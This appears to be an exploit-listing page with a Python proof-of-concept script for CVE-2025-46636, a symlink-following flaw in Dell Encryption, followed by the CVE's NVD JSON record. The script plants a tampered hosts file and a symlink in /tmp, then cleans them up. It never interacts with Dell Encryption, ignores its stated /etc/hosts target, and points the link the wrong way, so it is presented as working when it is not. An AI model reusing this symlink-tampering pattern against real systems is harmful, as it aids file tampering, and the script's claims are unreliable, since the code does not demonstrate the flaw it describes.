CVE-2025-46636

# CVE-2025-46636 PoC - Symbolic Link Following in Dell Encryption # This PoC demonstrates the symbolic link following vulnerability # Note: This is for educational and authorized testing purposes only import os import sys import time def create_symlink_poc(): """ Demonstrates the symbolic link following vulnerability in Dell Encryption versions prior to 11.12.1 """ target_file = "/etc/hosts" # Target for demonstration fake_target = "/tmp/fake_hosts_backup" link_path = "/tmp/dell_encryption_temp_link" print("CVE-2025-46636 Symbolic Link Following PoC") print("=" * 50) print(f"Target: {target_file}") print(f"Fake target: {fake_target}") print(f"Malicious symlink: {link_path}") print() # Create fake target file with malicious content with open(fake_target, 'w') as f: f.write("# Modified by CVE-2025-46636 exploit\n") f.write("127.0.0.1 localhost\n") f.write("# Malicious entry added\n") print(f"[+] Created fake target file: {fake_target}") # Remove existing symlink if present if os.path.exists(link_path): os.remove(link_path) # Create symbolic link pointing to fake target try: os.symlink(fake_target, link_path) print(f"[+] Created malicious symlink: {link_path} -> {fake_target}") except OSError as e: print(f"[-] Failed to create symlink: {e}") return False print("\n[!] Vulnerability Condition:") print(" When Dell Encryption processes files,") print(" it may follow this symlink and access the fake target") print(" instead of the intended file, leading to information tampering.") # Cleanup print("\n[*] Cleaning up test files...") if os.path.exists(fake_target): os.remove(fake_target) if os.path.exists(link_path): os.remove(link_path) print("[+] Cleanup complete") return True if __name__ == "__main__": print("WARNING: This PoC is for authorized security testing only!") print() create_symlink_poc()

{"cve": {"id": "CVE-2025-46636", "sourceIdentifier": "[email protected]", "published": "2025-12-09T18:15:52.033", "lastModified": "2025-12-10T17:07:53.850", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Dell Encryption, versions prior to 11.12.1, contain an Improper Link Resolution Before File Access ('Link Following') vulnerability. A low privileged attacker with local access could potentially exploit this vulnerability, leading to Information tampering."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:H", "baseScore": 6.6, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.3, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-59"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:dell:encryption:*:*:*:*:*:*:*:*", "versionEndExcluding": "11.12.1", "matchCriteriaId": "98044DEC-A30E-416F-AFDA-37151C304748"}]}]}], "references": [{"url": "https://www.dell.com/support/kbdoc/en-us/000394657/dsa-2025-442", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}